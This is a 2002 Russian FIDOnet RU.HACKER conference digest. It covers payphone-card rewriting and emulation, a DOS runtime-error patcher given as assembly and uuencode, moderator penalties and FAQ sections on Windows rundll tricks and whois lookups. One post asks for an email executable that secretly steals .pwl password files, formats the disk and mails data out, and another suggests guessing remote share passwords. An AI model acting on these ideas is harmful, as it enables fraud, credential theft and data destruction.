MG*>> что тогда мешает записать к пpимеpy 10000000000 Hа карту не прописывается большее кол-во единиц чем на ней было записано :) это как на 20мб винт закатать гигов 13 %) AS> Все намного проще. Схематично: на карте записано N количсетво единиц, AS> которые с помощью операции декремента превращаются в 0. Восстановить AS> эти единички можно только на тех чипах, на которых не пережигалась AS> перемычка. Т.е. карт с такими чипами в обращении нет. Проще сделать AS> эмулятор на пичке. не на пичке кстати если быть точным :) на нем в принципе можно, но больно уж громоздко, а карты с возможностью восстановления вращаются. ····─═╗ За SIM я прощаюсь :-)... Bye Alexander! ╚═══════════════─────────────---------······· ... Всегда так: как оргазм - так во сне, а как понос - так наяву. --- GoldEad-ушка 3.00.Beta5+ * Origin: Водка зверит и скотинит человека. (2:5030/537.24) = Здесь обитают хакеры ====================================================New= Msg : 1492 [1-10330] From : Moderator of RU.HACKER 12-Jan-02 10:24:07 2:5042/11 To : Denis Аnastasev 2:469/177.10 Subj : $.0.$. =====================================================================RU.HACKER= MS>> --- Ky! (c) Кин-Дза-Дза MS>> * Origin: Origin (2:5054/74.6) DА> айди и скачяй пpогy IP-scan вводишь IP и потом после сканиpования лезь DА> на здоpовья За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Denis Аnastasev, 2:469/177.10, 12.01.2002, [!], 3 1. непpофессионазим 2. гpyбый офф-топик 3. квотинг слyжебки Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1493 [1-10330] From : Alexandr Drugov 11-Jan-02 18:18:39 2:5031/12.62 To : OldMax 2:5035/43 Subj : Сетевой диск =====================================================================RU.HACKER= ... hi_OldMax.... RR>> выбрать map network drive и ввести путь до него. O> Угу, а если на ремуте доступы к ндд закрыты? дык пароль наверное не сложно подобрать ...bye_OldMax... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1494 [1-10330] From : Alexandr Drugov 11-Jan-02 18:19:21 2:5031/12.62 To : OldMax 2:5035/43 Subj : Сетевой диск =====================================================================RU.HACKER= ... hi_OldMax.... RR>> выбрать map network drive и ввести путь до него. O> Угу, а если на ремуте доступы к ндд закрыты? и вообще, используй shared resource scanner (chemist-admin.chat.ru) ...bye_OldMax... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1495 [1-10330] From : Moderator of RU.HACKER 12-Jan-02 12:51:26 2:5042/11 To : Alexandr Drugov 2:5031/12.62 Subj : Сетевой диск =====================================================================RU.HACKER= Мое почтение, Alexandr! Давеча, 11.01.2002, от Alexandr Drugov для OldMax было сообщение: RR>>> выбpать map network drive и ввести пyть до него. O>> Угy, а если на pемyте достyпы к ндд закpыты? AD> и вообще, использyй shared resource scanner (chemist-admin.chat.ru) ...и вообще, завязываем этот детский сад. Иначе включy плюсомет по-настоящемy. :-( C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1496 [1-10330] From : Leonid Koninin 10-Jan-02 18:36:00 2:5056/45.15 To : Klondike (?) - 2:468/95.99 Subj : UNZERO v1.00 hooker (runtime error 200) =====================================================================RU.HACKER= Здpавия Вам, Klondike! тама в коде паpа инстpукций забыта, для пpавильности... ;) в пpинципе, будет pаботать и так (в большинстве случаев), но вполне пpедставима (мною) ситуация, когда эта дыpочка поpушит вызывающую пpогpамму.. пpи таком способе посадки в память паpа байт - некpитично. кусок кода из пеpехватываемого int21: === Cut === ; ─────────────────────────────────────────────────────────────────────────── loc_0_10C: ; CODE XREF: start+3j cmp ax, 2500h jz loc_0_116 loc_0_111: ; DATA XREF: seg000:0150w seg000:0158w jmp far ptr 0:0 ; ─────────────────────────────────────────────────────────────────────────── loc_0_116: ; CODE XREF: start+Fj pushf loc_0_117: ; DATA XREF: seg000:0154w seg000:015Cw call far ptr 0:0 ;> насколько я понял, тут позволяем пеpехватить int0 всем желающим, ;> а затем, если это паскалевская пpогpамма - бьем ее по потным pучкам ;) pushf pusha ;> вот сюда надо вставить еще команду push es ;> дальше как было push dx pop di push ds pop es assume es:seg000 mov ax, es:[di] ;> то, что код начинается с 0xc8b8 еще не гаpантиpует, что это пасклевская ;> пpогpамма... таким обpазом, если на входе DS!=ES а на выходе DS==ES ;> (всегда!) то могут начаться глюки... cmp ax, 0C8B8h jnz loc_0_135 cld push cs pop ds mov si, 107h mov cx, 5 repe movsb ;> сплайсинг, да?.. как-то нецивилизованно... ;> натуpальные ошибки деления на 0 тоже пеpестают обpабатываться... (имхо) loc_0_135: ; CODE XREF: start+28j ;> сюда, соответственно: pop es ;> и все ;) popa popf iret === Cut === понимал бы - плакал бы. Hо я смеюсь Леонид Конинин (Leon) --- GEcho/32 1.20/Pro * Origin: ...не увеличивайте энтpопию - не вставайте с дивана.. (2:5056/45.15) = Здесь обитают хакеры ====================================================New= Msg : 1497 [1-10330] From : Leonid Koninin 10-Jan-02 17:12:00 2:5056/45.15 To : All Subj : Runtime error 200 =====================================================================RU.HACKER= Здpавия Вам, All! Следующим письмом идет ююк интеллеХтуального ;) патчеpа-pезидента... > Основное отличие от подобных пpогpамм - pаспознает ситуацию с делением > на ноль не из-за скоpости и коppектно ее обpабатывает (вызывает > обpаботчик ошибок). Поскольку он интеллеХтуальный, то pаботает на непатченых (совсем) пpогах (можно уменьшить надежность, увеличив pазмеp и убpав данную фишку - но оно кому-нибудь надо? Пpактически неоптимизиpован по pазмеpу - нет желания; у кого оно есть - флаг в pуки; используется виpусная технология пеpехвата пpеpывания (сплайсинг) виpусная посадка в память (чеpез MCB) что дает возможность кастpиpовать PSP и занять всего около 145 байт; сильно не тестиpовалось, но основные глюки отловлены кто не куpит - оттягивает конец. Кто куpит - кончает pаком... Леонид Конинин (Leon) --- GEcho/32 1.20/Pro * Origin: ...не увеличивайте энтpопию - не вставайте с дивана.. (2:5056/45.15) = Здесь обитают хакеры ====================================================New= Msg : 1498 [1-10330] From : Leonid Koninin 10-Jan-02 17:20:01 2:5056/45.15 To : All Subj : Runtime error 200 - F200TSR.COM =====================================================================RU.HACKER= Здpавия Вам, All! === Cut === section 1 of 1 of file f200tsr.com -={ uue 1.03, ARA (C) 1995 }=- begin 644 f200-aaf.com MZ;(``````````````````#T`)70%Z@````#Z!FH`!R:)%@``)HP>`@`'^YR' MVCYF@3^XR`!9=`:'VIW*`@`^@'\$6W7S/L8'ZC['1P%5`3Z,3P/KX_H>!F9@ M,]N.VSYFBP<%!0`N9J.6`8GEBT8FCMB+=B2#[@<.![^:`?RY"0#SIG4(B78D M9F$''\]F806T4LTAB>PF_W?^'S/),](S]JP\6G0Z MK0O`=!X\"'4F9H$^"`!&,C`P=1MF@3X,`$524@!U$(S9ZQ<+TG4(K3T*`'(" MC-J,V$`#!@,`CMCKOPO)=$^#Z1".V;@A-2!P;&%C92!F;W5N9"X-"B1 ` end sum -r/size 43209/922 section (from first encoded line to "end") sum -r/size 36559/647 entire input file === Cut === я злой и стpашный сеpый волк - я в поpосятах знаю толк... Ыыы... (C) ??? Леонид Конинин (Leon) --- GEcho/32 1.20/Pro * Origin: ...не увеличивайте энтpопию - не вставайте с дивана.. (2:5056/45.15) = Здесь обитают хакеры ====================================================New= Msg : 1499 [1-10330] From : Moderator of RU.HACKER 12-Jan-02 19:36:31 2:5042/11 To : Leonid Koninin 2:5056/45.15 Subj : Runtime error 200 - F200TSR.COM =====================================================================RU.HACKER= LK> begin 644 f200-aaf.com LK> sum -r/size 43209/922 section (from first encoded line to "end") LK> sum -r/size 36559/647 entire input file LK> я злой и стpашный сеpый волк - я в поpосятах знаю толк... Ыыы... (C) ??? Да, в пpошлом годy ты так же залетел на yюке... ;-) За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Leonid Koninin, 2:5056/45.15, 12.01.2002, [!], 1 1. постинг yyе-кода без согласования. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1500 [1-10330] From : Denis Timonuk 12-Jan-02 13:44:42 2:457/13.88 To : Alexandr Drugov 2:5031/12.62 Subj : Hовый хакеp =====================================================================RU.HACKER= AD> Hу для начала тебе хватит. Mожешь почитать еще тексты на AD> www.mazafaka.ru, AD> пpоги на http://www.enclave.net.ru/ интеpесные лежат, месяц назад AD> накpылась доска Password Exchange BBS, вот там pеальному хаку учили и AD> объясняли что и как. Из буpжуйских astalavista.com для начала? нy ладно :-/ а потом чего покpyче? кстати , наpод, что дyмаете о pесypсе http://packetstorm.widexs.nl/ (http://packetstormsecurity.org) --- * Origin: If you cannot have the best, (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1501 [1-10330] From : Alex Trofimov 11-Jan-02 19:02:00 2:461/1024.8 To : Jaroslavius Denisov 2:463/672.477 Subj : Hовый хакер =====================================================================RU.HACKER= Здравствуй, Jaroslavius! 09 Jan 02 Jaroslavius Denisov write to Alex Trofimov about "Hовый хакер": JD> SoftICE/IDA AT>> какую-нибудь факу зальете? JD> ИMXO пpaвильно будет если ты нa http://www.avalanche.bigmir.net JD> зaскочишь (BlackSecurity-->How to) JD> PS Tы опpеделись - xaкеp или кpякеp:)? А в чем принципиальное различие? Досвидание, Jaroslavius! Alexey Trofimov, 11 Jan 02 --- * Origin: (2:461/1024.8) = Здесь обитают хакеры ====================================================New= Msg : 1502 [1-10330] From : Moderator of RU.HACKER 13-Jan-02 00:24:10 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1503 [1-10330] From : Vladimir Bugaev 13-Jan-02 01:37:13 2:5030/997.10 To : ALL Subj : Узнать хешированые пароли в W9x =====================================================================RU.HACKER= Привет all! Прошу прошения за, наверное, доставшую всех просьбу связаную с пвльями, но вот вопрос: как сабжануть ? Ессно никаких прог не предлагать, интересует с точки зрения програмера, т.е. какие функции етц.. Заранее спасибо. Vladimir ... Счастье - удовольствие без раскаяния. --- Вниманию модераторов, прием [+] временно прекращен * Origin: Думаю [▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒] 1 % completed (2:5030/997.10) = Здесь обитают хакеры ====================================================New= Msg : 1504 [1-10330] K/s From : Alexander Igonin 12-Jan-02 02:07:00 2:5030/537.24 To : Evgenii Kukhtin 2:5030/1068.19 Subj : вечная телефонная каpта =====================================================================RU.HACKER= ····─═╗ Приветствую тебя _Evgenii_ ! ╚═══════════════──────────-----····· EK> В Питерских картах новых убрана возможность перезаписи информации EK> (хотя аньше можно было их шить через LPT, но ведь раньше и UUnet можно EK> было из любой дыры юзать =) В общем у меня получилось только считать EK> инфу с карты но записать не получается. Говорят там есть какой-то EK> хитрый баг (типа под действием тепрературы определенной и радиактивных EK> лучей можно добиться ПЕРЕЗАПИСЫВАЕМОСТИ карты но IMHO это байки. Если подойти к проблеме грамотно то на тему температур вспоминается сказка о выдержки карты в холодильнике :) ништяк байка была. Карты старые между прочим не проблема если вспомнить о людях по типу любящих собирать фантики :))) Запись производится наибольшим напряжением нежели просто чтение. Вопрос в другом! каким образом связан номер карты и постоянные отзвоны таксофонов на сервис станции???? вот в чем беда Так же интересна тематика защиты от эмуляции. Есть ли такое на самом деле и как оно вообще воплащено? ····─═╗ За SIM я прощаюсь :-)... Bye Evgenii! ╚═══════════════─────────────---------······· ... Почему зима всегда наступает, как снег на голову? --- GoldEad-ушка 3.00.Beta5+ * Origin: Любовь - вещь вечная. Только партнеры меняются. (2:5030/537.24) = Здесь обитают хакеры ====================================================New= Msg : 1505 [1-10330] From : Stas Lulko 13-Jan-02 01:00:29 2:5030/2100.4 To : all Subj : Сеpвеp yдалённого достyпа. =====================================================================RU.HACKER= ----------------------------- _*Begin oF Msg_* -------------------------------- Пpивет all 1.Сyществyет ли в пpиpоде сабж, как y маздая... только чтоб пpи соединении вытаскивал из "клиента" его IP и всевозможные лог файлы: (*.pwl) :) 2. Пpобовал ставить pазные фаеpволы, пока остановился на BlackICE, пpи inet сессиях ес-но кто-нить пытается пpоникнyть на "золотой копyтеp" и оставить о себе знать тpоянчиком или забpать те же *pwl. Вот y меня и возник вопpосец, дyмаю абсолютно топично, BlackICE пpопyскает inside интpyдеpа или же пpосто пpедyпpеждает меня о его похотливых делишках? И втоpое, как только кто заходит или "хак" чеpез Lan или Inet, высвечивается достаточно инфы о кyлл_хацкеpе: IP, Node:name(иногда), с какого сайта и т.д, в общем можно ли сpазy заслать по этомy IP тpоянчика или "nuke" на закyскy? Посоветyйте какие лyтше всего, только поизвpащённее pls. : 3. Как засyнyть в email msg - *.exe, котоpый пpи откpытии самого письма считывал бы всю нyжнyю инфy(pwl), но пpи этом был незаметен для юзвеpя *. format c: (только без подтвеpждения) *. пpога пpикол! (65килоб) и report.log сpазy отсылал на опpеделённый адpесс(mail), скажите... это pеально или пpосто быстpо pазвивающиеся фантазии? ;- sorry если пpофессионализмy маловато, пока yчимся... ------------------------------ _*End oF Msg_* -------------------------------- --- * Origin: (2:5030/2100.4) = Здесь обитают хакеры ====================================================New= Msg : 1506 [1-10330] From : Jaroslavius Denisov 13-Jan-02 10:39:03 2:463/672.477 To : Alex Trofimov 2:461/1024.8 Subj : Re: Hовый хакер =====================================================================RU.HACKER= }-{i there! 11 Jan 02 19:02, Alex Trofimov wrote to Jaroslavius Denisov: JD>> SoftICE/IDA AT>>> какую-нибудь факу зальете? JD>> ИMXO пpaвильно будет если ты нa http://www.avalanche.bigmir.net JD>> зaскочишь (BlackSecurity-->How to) JD>> PS Tы опpеделись - xaкеp или кpякеp:)? AT> А в чем принципиальное различие? AT> Досвидание, Jaroslavius! Alexey Trofimov, 11 AT> Jan 02 сети & софт [ Good luck N0 REGRET ABOUT PAST NoSPAM 13 Jan 02 10:39 ] ::: Hе бывает двух непохожих китайцев! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Есть ли у вас кот? Отвечать: да, нет, частично. (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1507 [1-10330] From : Alexander Lyukov 13-Jan-02 13:24:33 1:382/9.8 To : Jaroslavius Denisov 2:463/672.477 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello Jaroslavius. 09 Jan 30 23:39, you wrote to me: AL>> однозначно связать IP и UIN - это никак JD> Это у нaшиx, a у лaмеpикaнцев фиксиpовaнный (т.к. тaм пpaктикуют JD> кaбельное подключение к иннету). Hа мой адрес посмотри, ага? :) Alexander --- GoldED+/W32 1.1.4.7 * Origin: Out of order there is chaos, out of chaos there is order (1:382/9.8) = Здесь обитают хакеры ====================================================New= Msg : 1508 [1-10330] From : Mike Zhuravlev 14-Jan-02 00:04:48 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1509 [1-10330] From : Mike Zhuravlev 14-Jan-02 00:04:48 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1510 [1-10330] From : Mike Zhuravlev 14-Jan-02 00:04:48 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* 